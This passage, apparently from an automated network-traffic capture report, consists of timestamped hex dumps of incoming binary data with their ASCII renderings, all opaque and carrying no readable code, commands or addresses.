b4 c3 fe 9b af 39 24 24 8f 03 5c 2e cd 1b 1e ce 19 92 06 cc 5e 0d 36 5f 04 53 Data Ascii: LR(3)N #^>7\M~O8_XrF{!sHDUr?wCST$2]mb5P1Q3ka+WP,=RJGL;$aB`#>sv"{C'N]6m+ooQ3`rK9$$\.^6_S
2021-10-13 13:52:00 UTC	477	IN	Data Raw: 55 68 f7 43 8c 5a c2 e4 31 95 14 08 dd 54 37 81 01 cc 1e fa ac bc 8c 82 92 79 b5 63 d6 b5 92 2f e5 4a 8b 48 75 40 8d 38 ca 1f 8d 0c 01 15 5a 86 eb 2e ed fd f4 ad 65 61 7c 86 1b cd f7 8e cf f9 f4 36 17 49 24 8f 9a 0d 44 10 07 e9 07 a3 aa ae f0 28 2a ac d6 a9 9e 6b e5 40 d9 66 e6 32 13 61 32 4d 9a 8a 1d dc 1b bc dd c1 f7 88 0e ea 41 fc ee 38 8a 76 b9 ac 21 ab 50 32 bf 73 a1 8a 8c 26 fc 00 f9 6b 06 bc ba ea d3 dc c8 3e 32 30 6c a8 cb d4 46 17 94 dd e9 a7 f2 59 6c 72 8e 7a 67 7b 29 93 66 2f 4a 38 26 e2 93 da d5 eb 70 64 d9 64 c8 8f fd 08 ce 60 57 ee 83 a3 fd 5c 2e f5 0c 21 ac cb 1a f6 d6 f9 d2 11 9a b2 21 d9 eb ea 17 7c ee ab 00 3e 43 41 52 b0 81 38 88 ff aa 00 8c 88 fa 93 ce 22 18 1c 5d d7 3e 00 d1 67 43 97 db 26 f0 31 bb c0 57 31 ca 64 59 fd fe cc 8f b0 a9 Data Ascii: UhCZ1T7yc/JHu@8Z.ea\|6I$D(*k@f2a2MA8v!P2s&k>20lFYlrzg{)f/J8&pdd`W\.!!\|>CAR8"]>gC&1W1dY
2021-10-13 13:52:00 UTC	479	IN	Data Raw: 72 d9 6d 68 f4 ea c9 17 cd f8 29 22 3f fa a1 7e 93 bb 42 85 ae dd e7 b8 d1 48 7c d2 8f 6f 55 2f ee 88 2e ab 7c 85 3a 56 c8 1b bd dd a1 75 a9 44 e9 69 c9 41 ff 0d 38 82 77 1b 2f d0 a0 1d 05 65 d5 d3 7a c9 9c 2a a5 d6 6e c2 37 73 6b aa ea 59 e7 8b fa a8 df 04 d6 ee 81 e5 5c 99 8a 3e 54 e0 9c a4 89 74 8b c3 3a 9f 8a 1a 19 85 20 e8 70 d4 44 ee 19 41 75 9c 96 12 f4 fb 0d a6 3c 16 1e 9d a5 0c a8 76 30 f6 94 85 61 26 f9 5a 84 9e 4f 2d 7e 11 53 60 a1 1a a0 8d 93 8c 7a 2f 3e 1f 54 0a 1b 1a 30 3e 5a 30 bd f6 f8 8f 1e 6f 70 51 54 2f 6a 4c b0 02 99 b0 cc 22 52 09 cc bb 45 51 c7 35 ae 06 55 2f 3d 49 ae fe af 4e 97 f2 6c 16 08 5a 5b c7 38 17 c8 c5 66 ff c9 65 2e 67 d0 6c a1 2e 95 d8 1a 98 a5 0a f4 55 24 93 ad 3d 7d 3e 8a ce d6 58 06 78 ba a8 21 33 c7 d5 06 ca 42 37 6d Data Ascii: rmh)"?~BH\|oU/.\|:VuDiA8w/ez*n7skY\>Tt: pDAu<v0a&ZO-~S`z/>T0>Z0opQT/jL"REQ5U/=INlZ[8fe.gl.U$=}>Xx!3B7m
2021-10-13 13:52:00 UTC	480	IN	Data Raw: b8 23 66 4d f4 6f 68 65 ae 56 9f 9e 04 3d 86 07 08 d2 05 77 b4 71 30 8b 5b 31 20 b5 2a f9 61 b5 d6 c9 e9 1a 45 68 b2 ad d7 8e 73 cc 25 3c 03 90 dc c2 e0 46 76 ec 07 fe 1c 5d 38 af a8 f8 2c 81 75 75 91 8e f6 d7 12 83 03 6e c8 25 34 e4 16 c5 84 20 a9 92 4e cc 8d 97 4d 77 3c 98 94 4b e7 5c ac c7 0a ba a3 b6 b9 fd 20 e4 91 b5 3e bb 07 ad c9 2b b8 58 80 81 f2 f8 45 e2 c3 97 0a 1f a8 50 d7 e7 73 5b 51 61 5b 93 4f ef 97 2a e9 85 d2 6c f0 dc 2c 73 be 1f 8c ef 27 47 19 9f b5 d8 2b 57 b1 df a3 56 4b 02 a9 5f 5c f8 3d 7b 80 75 33 6c c8 9d 35 0a ed f6 93 21 3e 4d ac 44 20 97 69 09 af c0 35 84 9d 86 2b 5c 54 e6 cd e1 69 81 38 51 27 15 9c c4 fb 77 00 83 13 1a 1b 99 90 85 91 99 06 13 c1 22 36 6b 61 d5 2c 82 c7 b9 16 54 33 35 b9 30 ae 4b 01 fe ba 31 d3 e6 3c f2 78 9c ea Data Ascii: #fMoheV=wq0[1 aEhs%<Fv]8,uun%4 NMw<K\ >+XEPs[Qa[Ol,s'G+WVK_\={u3l5!>MD i5+\Ti8Q'w"6ka,T350K1<x
2021-10-13 13:52:00 UTC	481	IN	Data Raw: 5f b7 41 6d 17 f6 f2 cf cc 5a 48 5f 32 a7 66 f1 54 5b 3d a4 96 54 81 ad 4d 31 d5 b5 27 e6 77 a6 21 65 b8 f5 8e b1 b5 5f 9c 69 16 36 2f 95 59 52 1f cd e3 b9 c9 a7 19 86 fc 6a 97 5f 4f a3 ae 8d b6 d8 65 9f b9 28 bf 2f ab 02 73 e6 c7 df df ee bc 9c bf 09 4e cf f1 e7 ea c8 26 fa 7c 73 1e 86 1e 81 d3 9e e2 7b 25 91 c8 84 90 af 90 48 ac cd a8 00 84 66 93 6e 30 4e 6b dd e2 f7 af d4 25 b1 27 70 9b 9c 87 1c 7f 80 7c 16 3d b5 8c 0d aa fa b9 2c 65 3f c2 9b ac 7a 26 06 67 91 3e ee 5b 1d 58 4e dd 3a 2b 2e 21 63 6c 3a 62 f3 34 4f d0 da 28 63 dd 84 91 9e ad 7d 92 2f 3f 93 64 4b e4 45 ef f0 e4 41 b0 86 5d ad c0 62 3a 72 02 86 de a8 12 d4 71 55 ea bc c4 da cf ea 9d df d6 11 5a b5 16 ec 08 12 49 55 96 4b ae 5e 97 56 86 6e ba 6e 1c 5a 32 4a ad 3d 2f cf 95 fa b3 3a 1b 66 13 Data Ascii: _AmZH_2fT[=TM1'w!e_i6/YRj_Oe(/sN&\|s{%Hfn0Nk%'p\|=,e?z&g>[XN:+.!cl:b4O(c}/?dKEA]b:rqUZIUK^VnnZ2J=/:f
2021-10-13 13:52:00 UTC	483	IN	Data Raw: 76 b7 e6 2c 3e 06 9f 13 59 b5 eb 31 2d c0 ed 96 64 f4 16 dc d0 fb 7d e2 22 3c 44 a8 be 2b 8e 49 08 14 aa 52 00 8f 4c 7a fa aa 62 e4 60 4e ad 37 7a 59 45 ad 78 df 31 06 2f 68 19 13 29 d1 6d b1 05 26 97 39 99 b6 a1 f2 0b d5 62 89 55 02 44 58 ec 05 db 10 2e f4 0a ea 69 17 0f 18 da e0 c2 a7 a3 49 40 6a 69 24 43 3e f7 ff e1 1a 46 89 2a 29 26 46 77 ea 6a bf 8f de 10 c7 61 e1 a5 ea 37 66 e5 0b 98 ac c5 a8 3a 04 be e4 b6 7c 23 ac dc 5c 36 18 ef 3c b5 ef 2f a0 13 38 6e c3 f1 ef 03 b1 4e 29 cb 8b 67 d0 66 48 a5 b6 a2 55 cd 79 0b da a3 96 d6 02 fe 29 29 13 b6 98 91 60 f7 16 b2 0e 28 cc 55 00 8e cf 7e 60 96 49 51 e5 de 48 7c 68 58 35 1d 3a 43 61 29 bb a0 87 56 3e 0c 57 8d 55 cc ee d5 82 d2 d9 88 c8 ec d9 99 a2 3a b2 74 cd 9c 24 a4 03 fb 40 b2 e2 16 f9 a1 c7 b1 d6 53 Data Ascii: v,>Y1-d}"<D+IRLzb`N7zYEx1/h)m&9bUDX.iI@ji$C>F*)&Fwja7f:\|#\6</8nN)gfHUy))`(U~`IQH\|hX5:Ca)V>WU:t$@S
2021-10-13 13:52:00 UTC	484	IN	Data Raw: 10 c2 69 db a1 f1 32 39 8d 51 ed 0c da ac 61 8b 87 83 bd c5 9d 6d a8 dd 54 0f f9 f6 8d 74 10 7b f3 5f bc be 36 a1 b3 ae 23 04 eb ce 1c c7 10 84 05 8c 89 2f a2 78 86 82 cf 21 93 64 a6 a6 54 e6 5e 18 10 31 8b 65 97 10 0b fb 98 9a e4 41 b9 0a 2b da fd b8 94 0e 99 b9 48 1d ac 75 31 2c 5d cf d1 60 a7 d0 23 32 a7 37 49 9f e0 23 87 32 a4 a4 53 93 a4 02 6b ec 74 59 52 d1 a0 87 92 2a 6e 19 81 7e 3f 98 49 9f 59 27 70 fc 1a 7a a6 d3 9d 1d 4f 48 10 c1 ae 56 90 ea 51 4b 0a 8c ca 34 75 0c 1a 09 05 28 5c 17 89 91 dc 74 c0 64 e8 ac 04 03 ea 10 20 ec 82 45 6a 2d fc 19 ea b1 fe 5a 28 eb e6 7a 04 fe 87 ef ee bb bc 0c 72 b4 1c 73 25 18 39 79 23 d3 88 3c 65 f2 c0 f7 b5 a7 bb 30 48 68 9a ad 28 6a 25 41 a3 02 8d 79 d9 38 6d 2c d4 fe a4 e2 6f 19 0d ef a5 7b 9c 9d 73 0a da 16 f5 Data Ascii: i29QamTt{_6#/x!dT^1eA+Hu1,]`#27I#2SktYR*n~?IY'pzOHVQK4u(\td Ej-Z(zrs%9y#<e0Hh(j%Ay8m,o{s
2021-10-13 13:52:00 UTC	485	IN	Data Raw: d1 ac e2 02 ab 42 53 ca 44 d6 5b 34 99 e5 a8 7d 0d 6a 85 e6 46 28 05 e6 fc 71 fd 93 fe 7a 39 ec b5 36 9c 65 95 27 57 05 ce 1b f7 ea 0d c5 65 a7 9e df 45 20 01 f4 64 63 bf c7 ec 39 22 5e 0e a1 ed 2e 70 68 b8 50 22 2e 5a 84 35 38 7c ae 9e 35 b5 b4 19 dc 4e d8 97 c1 cf 72 2f dd 2d 5c 6a 66 0d 8e 9d 92 36 a0 24 b0 a3 f0 12 ce f9 f3 af 95 a0 92 34 30 97 8b bd f0 4d 57 b9 d7 b2 38 78 80 a4 4b 7c c9 91 09 af 53 74 7d d4 ec 53 bd f0 9f ec 40 6b 4f 2b 8d 97 62 87 83 a9 ae ea 5b 86 10 ca 71 c9 be ab 6f 45 d7 85 ff 60 aa 0b 7c bc 76 39 1f d5 e3 94 19 15 79 f1 55 99 1c b0 3c 05 6f 99 04 f2 f1 fe f3 0c 86 7b 33 c1 57 a3 ec 82 ee 99 eb c1 c9 00 f5 e8 bd c5 1a d5 8d 10 83 53 00 d1 55 20 d7 5b bc 0a 45 73 dd bd 19 c9 7b 47 cf ab 31 c1 74 e5 25 0c be 72 fc d8 b6 c0 cd ed Data Ascii: BSD[4}jF(qz96e'WeE dc9"^.phP".Z58\|5Nr/-\jf6$40MW8xK\|St}S@kO+b[qoE`\|v9yU<o{3WSU [Es{G1t%r
2021-10-13 13:52:00 UTC	486	IN	Data Raw: cd 0a 7e 8a af 04 9d 71 87 df ca 60 19 d7 ba ab 96 cc 1d 83 cf eb 58 7d 02 aa 91 24 af 9c 93 4e 8d 3e e0 49 97 65 f5 a4 73 50 ed b0 b5 11 16 43 0a ab a5 39 e1 a7 5e 2c fd fc 9c d2 c5 04 78 78 3e 75 da 8a 92 b2 be 77 00 63 e9 26 d1 1a 93 38 a3 c3 6c 3a cb f7 6f f6 26 25 55 4c 67 ef 96 11 6d da 98 71 09 c1 fd 71 00 ca b1 c1 95 76 af ab ec 96 62 09 d8 25 9a e6 7f d4 cc 6c a9 db b7 e8 fc 1b 2f 7d d5 0f 2f 32 93 8d 2e c6 b4 45 83 4e 3a b5 6d 09 ee 31 91 73 39 9a 51 2d a0 f3 2b 49 db d5 27 c1 b8 65 28 4a 58 ca 48 e1 1c b8 e1 2c b6 3a 68 9d 7a 61 ea 1b 72 a5 70 8e cd 3d 15 b7 10 09 e9 67 84 c5 57 8e 93 10 64 f5 b0 2b 86 c3 01 08 ea b8 9c d9 d2 85 d5 60 b1 82 8a 34 9d 5f e3 fa 7c b9 14 86 73 ee d8 45 1e b9 bc be 98 8a 5f 9b be 51 7c 16 6a 34 84 46 8d 40 6b 89 25 Data Ascii: ~q`X}$N>IesPC9^,xx>uwc&8l:o&%ULgmqqvb%l/}/2.EN:m1s9Q-+I'e(JXH,:hzarp=gWd+`4_\|sE_Q\|j4F@k%
2021-10-13 13:52:00 UTC	488	IN	Data Raw: 9d ff 9b ca 96 ab d6 64 a3 74 c4 3e 1f 61 e1 ea 55 8d 09 37 83 4e f2 8b 44 9a ea ed cd 7c 88 e8 4f 09 a3 19 16 4a f7 79 90 88 ed c1 2c 5f b5 04 f2 87 39 02 f4 60 d7 30 f8 e6 f5 60 9d 92 9d e8 2d d8 a1 a1 52 41 20 14 6f 32 1f 3e 52 b3 84 27 b9 54 3d 40 9a 51 c1 10 53 eb 6f 5b 28 8c e7 46 b2 c6 1d 14 db c2 5e c4 36 f6 87 32 aa 8d 28 6e 86 a2 50 23 e5 9d ff c8 4b 38 7d 76 27 7d 30 a0 f8 2a a1 01 12 9a 78 96 ed 4a 07 bf 05 05 fb de 7d f5 0c 3f cb 2b 91 ea 65 fc 4c d2 03 6a 42 00 30 42 79 8e b0 06 4c 78 30 df 4f d1 54 83 9f f3 31 1d 82 c0 d0 7a 5e db f8 77 3c 3a 9f bd 91 89 73 9c cc ed fb a4 74 8f b0 8d 9d 8c 4c 48 55 31 7b 34 fe a7 b7 0c cc c5 71 56 a0 7b 67 32 67 e6 34 97 4a f6 4a 35 c6 dd 58 a4 ab 71 72 13 d2 7c 27 24 9d bd 50 87 18 ca ae 03 18 ab be 53 fb Data Ascii: dt>aU7ND\|OJy,_9`0`-RA o2>R'T=@QSo[(F^62(nP#K8}v'}0*xJ}?+eLjB0ByLx0OT1z^w<:stLHU1{4qV{g2g4JJ5Xqr\|'$PS
2021-10-13 13:52:00 UTC	489	IN	Data Raw: f4 64 82 0b 15 03 19 71 ed d3 4c d4 00 a5 37 9c 3f c6 32 10 16 3d dc 1e 3d 52 68 81 bb 32 91 e6 bd d4 5d cb 8d 16 60 31 77 29 67 9b 68 d7 a9 fc a1 36 6b 44 a7 0d f3 72 d9 47 43 1e 68 f1 62 d9 65 4a 3b 94 97 68 ec 4d 3d 3a db 0d fe 0c a2 96 00 5d 71 7e 27 14 4f 17 9b d3 3e 90 39 f7 db db 73 2b 37 90 41 57 1c dc 7e 87 4f 96 14 87 49 38 43 6a c5 d4 7c e5 fe 1f 49 04 2f 4c 1d 62 6d a2 90 55 28 bc a8 0d 78 fc 8a b5 c6 a4 a7 dd 59 ac 82 3e fc 90 79 b9 0f fd 7d fa e7 a6 44 d3 98 ae 6d e9 c5 5f 77 7b 97 34 9d 49 65 70 01 db c8 8c ba 95 b9 ee 99 ac c0 3f f5 67 60 08 6c ee e3 d1 99 c3 ad 74 12 b2 5e 33 94 5d 4c 42 40 f2 9a f7 3d b0 fb 09 ef f9 37 98 48 84 13 c8 5f fa d8 88 50 36 62 bc c8 5b 45 9f bd 74 8c 0c 3e 3a 90 37 ca 96 2f 2c 6a 02 ec 35 ae 13 07 1b 60 ba 79 Data Ascii: dqL7?2==Rh2]`1w)gh6kDrGChbeJ;hM=:]q~'O>9s+7AW~OI8Cj\|I/LbmU(xY>y}Dm_w{4Iep?g`lt^3]LB@=7H_P6b[Et>:7/,j5`y
2021-10-13 13:52:00 UTC	490	IN	Data Raw: ef 39 0c 68 35 20 18 14 7b 3d cd 9c 3b 8d c0 18 90 f3 52 32 a1 13 0c 52 93 61 0f d9 b4 c3 fb 1d ae 8b a9 1d e2 15 62 e5 c8 fa d6 e8 30 04 c4 b5 89 d0 4a a9 62 60 4a bc 98 e8 95 b2 36 90 6d 3a f2 60 92 c2 0e 59 4e 1d 99 81 63 33 f7 a6 72 1a 90 56 50 24 62 ac 29 a7 c5 9b b5 b9 76 43 59 2c f5 54 71 55 33 41 42 09 99 48 f3 ff 81 09 4c e0 e2 a5 88 30 0f 1a 7a b0 df fd 80 b6 de 02 0f 87 19 fd 6c 0e 30 49 05 92 21 07 ef 2e ff 56 7a 9d 74 db c6 c7 c1 f7 45 6c 53 75 75 63 33 a7 74 31 0f 00 18 ca cc 4d 4c e5 1b 88 b1 77 09 e2 e5 4f 6a d2 e3 24 bf 41 4c 52 05 a5 3c 49 76 8c 47 13 4f 0f b7 2c 86 1f eb e6 f4 9c 99 e9 4a 97 6c 98 fe d2 e5 17 3d 6b c6 a1 15 f5 a2 14 ee 6c f1 ea 72 fa 07 1c 05 96 97 8b 89 fa 22 03 0c 36 03 9b 7a 92 c5 70 2d 9b 1f 66 48 95 24 32 f3 b0 7b Data Ascii: 9h5 {=;R2Rab0Jb`J6m:`YNc3rVP$b)vCY,TqU3ABHL0zl0I!.VztElSuuc3t1MLwOj$ALR<IvGO,Jl=klr"6zp-fH$2{
2021-10-13 13:52:00 UTC	491	IN	Data Raw: c3 ae 57 42 f0 d4 d1 f0 11 b5 12 72 52 33 3f 3d 67 03 fc 29 0b ec 66 b7 12 55 e5 3c 57 96 4b 54 4e e2 e1 11 dd a9 79 ac eb 61 e9 23 ee ad dd 4a 33 fc f8 56 9e ea 4c c3 e7 2a f2 c0 e9 a6 ef 5d 09 84 da b7 1c 1d 95 9e 7d f6 e1 92 bc 60 ad 5c fd 7f 1e 86 6b 16 36 95 32 5c 0a 3e 59 53 2f 34 35 b5 24 f6 98 cc 13 28 81 1b 2a 6a 1f ed f0 08 67 ce e6 93 c1 f6 ce a6 5d 1c 62 9d f8 25 83 54 d5 d6 f3 99 8e e7 31 38 0c 5e 73 b1 4c f1 de 55 91 dc 71 12 d4 0a c4 bf 1f 12 6b 07 a6 4c bc e5 47 9f d4 e8 b7 b3 07 a1 7a 40 17 35 f8 27 f6 8c 69 a3 2b 71 23 f4 79 f6 d0 09 7d c8 f0 d1 5c 15 c7 2e f1 71 03 df e3 59 d2 a1 bf c0 ab 1d 20 ca dd a6 2c ab e9 ad 35 dd 2f af 00 fc 8c 26 58 71 cd da 64 c8 7c 8c 52 df 37 31 99 2e ab 7f a4 25 e1 6f 14 dc 95 33 94 c7 92 2a cc 22 aa 2b d9 Data Ascii: WBrR3?=g)fU<WKTNya#J3VL]}`\k62\>YS/45$(jg]b%T18^sLUqkLGz@5'i+q#y}\.qY ,5/&Xqd\|R71.%o3*"+
2021-10-13 13:52:00 UTC	492	IN	Data Raw: fd 77 6d d5 53 8b 5a 7c 5e 7f 5f 16 b0 df c6 93 f5 ad 7b bc c2 ff 4a 8b 46 8f 98 cc 5c 6c 7a 49 f3 f5 4f 09 ed d1 ec a6 8d 03 0b 95 f9 0d 7b 22 d4 c6 f8 f1 5c 66 f1 da 24 20 3b f6 bf 7c 13 51 93 f7 60 a6 15 44 2d cb 66 ee c9 be bd 8a d8 06 94 94 4a 20 69 a8 af b3 d9 47 60 24 9c 95 e6 1b d6 37 14 cf c1 44 09 29 04 9e d7 dd 0a b4 94 33 79 1b 48 d5 0b ed 95 29 87 73 62 7a 01 5f 10 1f 2f b5 d2 a9 7c 96 67 e6 85 f1 ae c0 29 b3 b1 67 d7 57 35 91 28 3d e3 76 d3 b9 56 9e 75 94 8e 8f 1b b2 b7 0b a4 e2 5a 15 c9 df 40 cb c2 d2 8e 99 88 cc d8 71 3b 9a 31 da 52 e5 ec b3 32 6d d2 91 bf 86 7a d6 d7 be 29 df 5f d3 a0 fa 8e 52 88 56 d4 5b b9 f3 16 d2 af f5 01 91 e4 90 85 63 14 1a 68 ea 5a 16 0f 78 3a ba 30 67 f5 b6 d2 d8 db 09 a5 45 d2 7e 51 09 e9 ba d1 6b e0 b0 10 1e 47 Data Ascii: wmSZ\|^_{JF\lzIO{"\f$ ;\|Q`D-fJ iG`$7D)3yH)sbz_/\|g)gW5(=vVuZ@q;1R2mz)_RV[chZx:0gE~QkG
2021-10-13 13:52:00 UTC	493	IN	Data Raw: 99 2e 68 ad 0a 38 59 81 8a 72 30 1f 99 85 db 38 c1 28 2f ef a4 2d d7 88 ba 5a f3 48 f8 5e aa 67 92 9c 72 3b 2d a4 49 ce 57 5a a1 a9 33 26 f5 b4 4d 27 a9 f2 1b 52 9b 29 c0 29 b5 7f bf 92 91 cb db 4e f5 20 50 c9 48 f7 fc d8 f1 3c 6e 5f 05 83 27 c8 01 5e 84 db a4 43 ed b9 23 3f df 6d 07 99 6d 85 b4 6b 62 aa 64 bd 98 d6 79 dd 78 88 70 37 17 4d 32 7f 49 32 8d 3b 1c f6 09 a2 03 fd b9 d8 00 ee 4f f1 12 3e f7 89 2f 0b c0 00 b3 7f c8 53 18 e9 ab 91 7b 6d ab 40 9b f0 87 4b 18 ad b5 bd 89 55 bb 95 4b 5f 4f 5e 0f 3e a8 6b de 26 93 d9 d3 c5 12 68 fc 00 80 a4 06 c2 7e 06 36 87 99 11 ee 26 1e 1d b7 58 62 2e aa be 74 77 bb 7a b6 7d 11 b8 54 da d0 af 75 6c 73 5c 21 34 cb f2 81 44 90 b8 b3 d2 ec f4 8c b5 14 52 b3 49 04 d7 bf 42 fb 09 46 d3 64 4c 60 fa ba 5e 3b 4d 86 90 8b Data Ascii: .h8Yr08(/-ZH^gr;-IWZ3&M'R))N PH<n_'^C#?mmkbdyxp7M2I2;O>/S{m@KUK_O^>k&h~6&Xb.twz}Tuls\!4DRIBFdL`^;M
2021-10-13 13:52:00 UTC	495	IN	Data Raw: 58 e1 f2 80 84 be 02 45 fa d0 0c 0a f4 54 56 11 61 6b 26 65 61 e1 18 01 86 d8 10 cb d5 e9 b8 db 62 5a 2b e3 75 b7 8a 04 fa 50 98 26 a5 a6 90 ff 87 ca 9a f0 99 6e ae 44 3f fd aa 0e 6c 52 c4 fc 49 67 a5 bd 4f 50 3b b3 79 f3 79 c9 12 7d f5 f8 c9 e1 c3 92 2b 01 97 17 58 a9 c2 b3 46 15 eb 66 e6 3c 43 27 5f b7 a6 94 1f e1 9c c7 99 97 f5 c9 cf 65 e5 d1 90 8a 67 3d 61 b8 63 bc 07 7f aa e3 f7 fe 43 5c 31 6a 40 35 1f 2d 64 bc 52 69 09 20 be fd dd a9 38 f9 63 d2 3d 38 e2 db 2b 20 ce 23 d2 d2 36 f3 26 8f a3 60 9d 08 95 49 d6 50 40 94 a5 9a c8 28 e3 79 20 b9 14 bc e7 a4 d8 19 64 2a 12 3f 91 93 50 a4 1e 5f ad 88 cf 84 af 75 51 93 77 63 d2 9b 0d ba 06 31 70 56 18 a6 92 f5 75 80 64 ca d3 ab 0f 1d b3 93 58 c4 45 9e db 54 00 21 8c 8e 78 1d 18 09 d7 97 78 a7 18 fc 5d d8 93 Data Ascii: XETVak&eabZ+uP&nD?lRIgOP;yy}+XFf<C'_eg=acC\1j@5-dRi 8c=8+ #6&`IP@(y d*?P_uQwc1pVudXET!xx]
2021-10-13 13:52:00 UTC	496	IN	Data Raw: 47 d7 65 b5 eb a2 5c f9 c9 65 20 88 6c b0 f9 bb 00 9a e8 98 20 dd 4c 31 58 63 56 46 ae 1f 95 27 f2 e1 68 95 61 81 88 a6 cc a3 fc b2 a6 d7 53 20 d4 2d e6 f4 bb 6e 84 be 4f d3 8a 34 da 0a e5 a5 d6 e1 c6 8f cd a2 c2 3a 60 07 28 b9 cb 72 2b 0d 42 10 21 32 c4 a3 72 0a ab a8 f7 83 09 13 66 c8 9b df 6a d6 49 fd c4 01 ed 8f 7e a1 6c 18 54 56 0d b0 8e eb df 55 57 09 5c bd 07 19 c5 50 8d a7 8f 7f 41 16 04 88 72 a4 81 2f 58 57 34 c1 46 0c 94 09 92 6e 04 66 69 05 b2 52 5c ac 65 38 62 6e 5a 7d ce 74 0a 33 13 42 26 c4 53 1b a6 e9 1b df 5c a4 0d 47 26 62 cb 6d 6d f1 0b bf 75 3d aa 69 37 08 65 6d f4 00 8b f0 88 ad 3f 43 3d 95 96 b0 34 2d 16 08 64 03 1f 5b 2d bb 27 5a 39 62 12 1d 9a fd 5d c1 2c d0 89 54 e9 e0 cd c6 c9 e5 3a 1e ae 1c 8a 0a 09 8e b5 ce 79 cb d9 e3 e3 2f ae Data Ascii: Ge\e l L1XcVF'haS -nO4:`(r+B!2rfjI~lTVUW\PAr/XW4FnfiR\e8bnZ}t3B&S\G&bmmu=i7em?C=4-d[-'Z9b],T:y/
2021-10-13 13:52:00 UTC	497	IN	Data Raw: 3b b3 ed f6 01 8e 59 52 4f f4 3f e3 ff 6b df 93 02 fc c6 8a 39 ae c4 bf 01 4a fc 05 86 a5 fa ce b9 fa 24 08 ea 6e 21 46 d8 cc 40 0f 52 56 63 ad ec d8 58 d2 0e 01 43 02 54 45 ed d0 f6 8b 2b 64 fd 1f 32 23 db d8 2c 22 d1 d2 61 40 01 8d ac d4 75 a9 5d 22 78 7b 64 29 c3 67 58 59 6a d8 79 7c 8c be cb 79 12 3c 9b 55 82 c2 1a db f0 ca 94 db 3e 89 11 c9 61 1a 94 45 93 e6 c3 e6 1b 6e 52 c3 24 a9 e9 bf 8c 90 e4 df b1 aa 2a c4 13 d9 2c c5 9a d4 ef 0e a7 75 b1 f3 35 bc f1 6c d8 75 d5 cb 3f ff 2c a9 ab 97 c9 4d 82 bb d4 56 d6 2b 4f 81 99 c5 28 0e 83 de f0 15 ab 89 8d b6 4e f8 55 16 a0 d2 d8 e5 9d ca c5 a5 5a b0 18 cf 3a 77 36 1c 46 11 33 3f f1 18 a6 0a 3b 29 aa a3 4a 61 93 27 0c 84 5d f3 a2 a3 6c 5f 03 02 29 15 fd 6f a1 13 d8 40 cf 8a 80 01 7b 29 31 4e 8d df 84 b2 89 Data Ascii: ;YRO?k9J$n!F@RVcXCTE+d2#,"a@u]"x{d)gXYjy\|y<U>aEnR$*,u5lu?,MV+O(NUZ:w6F3?;)Ja']l_)o@{)1N
2021-10-13 13:52:00 UTC	499	IN	Data Raw: f3 da 8b 41 59 48 15 21 56 c4 38 6e ee f9 da 6c 0e 89 93 99 80 e6 6d 35 ad 1b a2 71 69 2a b1 b9 49 76 4c 42 65 e4 70 69 c8 62 d8 01 09 76 b8 80 e5 41 61 7c a3 f0 2e ca 8f 23 01 e8 3d b9 78 83 97 b7 4e 54 70 5e fa f6 fc cf 0b 61 44 f6 73 e1 db b4 37 21 d3 63 86 d6 75 62 02 ee 34 af 58 54 d4 60 79 ab cc 38 1c ef c6 75 db 0f 4e 97 45 6e 3d 78 71 49 4f 22 56 f4 78 cc 5e 47 0d e9 25 a1 b0 f4 0a e4 bd 34 0f ca b1 15 b7 d6 fd 64 08 c3 7d 3a 3d 04 53 35 17 d4 8f 8c 5e 4e 0a 2b 18 d4 34 7d 81 2e 83 57 45 20 f8 12 f1 b7 a2 ba bb 3e 78 02 62 61 0b de bd d9 d6 12 e7 8c ac 25 ea 98 0b 9d ba 03 c2 a7 22 1d fb 84 1e ba 4c c6 cc 64 79 d2 d3 98 65 db c0 a1 5e 57 5a 16 83 59 eb 9e 89 6e 37 3f 31 33 0b a1 e0 af 25 2e a3 3d 6c c8 a5 cc 4c b2 25 f1 0f 09 5d 5f 32 f0 8a e5 7b Data Ascii: AYH!V8nlm5qi*IvLBepibvAa\|.#=xNTp^aDs7!cub4XT`y8uNEn=xqIO"Vx^G%4d}:=S5^N+4}.WE >xba%"Ldye^WZYn7?13%.=lL%]_2{
2021-10-13 13:52:01 UTC	500	IN	Data Raw: 65 42 7f 20 e3 eb 2b b8 68 ab ce ff 7a 05 e5 65 14 cb 17 a3 29 41 36 71 e0 f5 42 0a 9f 5f b6 6c 2e 33 4b f2 89 36 2d 8c 25 18 a8 01 79 98 2b b1 7a b6 9b 81 53 b3 ec 31 97 71 2d 86 6e d6 4d 2a 1a 81 96 73 ec 33 af 0b 28 2c 21 b3 bd 6e 53 a3 8c 7b e5 5a 9b b8 77 c4 08 a6 21 b8 27 e4 1f 61 2b 22 8c 9c be be 3e 12 6b 2a c7 26 9d 92 e4 10 32 fe 7b bf b7 0f 4f 88 4a 7f 06 d8 1a f3 0b 47 6e 7e 45 0e 09 74 cd 05 d1 d0 6c d4 7f 90 99 e4 d0 ac 1c 9a f8 6c 76 4f 8f 9e 4f fc 13 a3 33 d1 26 d5 2f 95 93 d9 f7 70 51 85 95 ed 79 d7 14 9e 3f 87 83 2d 1a 71 5c bc 34 de 39 8b 16 dd c2 67 1d c3 b2 7e 82 1f ff 26 eb 6b 09 ee 4b 37 e7 cf e2 35 ea 17 56 17 16 f1 ee ab ea fe 4c ae 2d fe 35 72 ef 4c e5 1d 84 9b 3c 7a 23 95 b1 e2 f2 21 f5 e8 f5 68 3a a3 d7 c0 d4 e0 14 4d 67 76 b9 Data Ascii: eB +hze)A6qB_l.3K6-%y+zS1q-nMs3(,!nS{Zw!'a+">k&2{OJGn~EtllvOO3&/pQy?-q\49g~&kK75VL-5rL<z#!h:Mgv
2021-10-13 13:52:01 UTC	501	IN	Data Raw: 9a c3 6b ed 42 94 13 7e 89 c9 95 29 89 02 3a 96 09 78 3b be 03 bc fc 00 c5 fe fb ed 5b d9 cb 4f 3f a5 a3 15 aa 15 2e 3a 68 7e c1 a1 7e c4 b9 7b 76 0e df 11 c9 24 c5 1f 82 e6 91 2a a5 0c 93 a4 e7 11 8a 4d f5 3c 0b b1 16 17 13 e4 2d 63 91 45 c2 81 4e 79 b5 51 b4 76 51 91 c9 2a 13 3b eb 3e 2d 25 91 12 49 02 99 5f ea d9 9a 7d 20 fb 57 ff 9c 25 1c f8 36 ba 55 77 26 c4 7d 07 8c 94 b8 d9 18 48 74 7b 60 f6 d3 61 3d 51 26 c9 6d d2 64 0e 26 2f 5a 32 50 eb 35 2f 9e 8d b4 d6 69 7b d9 57 a1 b3 bd 46 90 28 11 e7 19 40 89 30 71 3f ec db f0 18 52 8a a9 fc 64 eb 34 d8 48 92 31 84 a3 7d 22 b7 03 1d 5c 52 b6 b3 56 a4 cc a8 54 eb bf 7b c3 f4 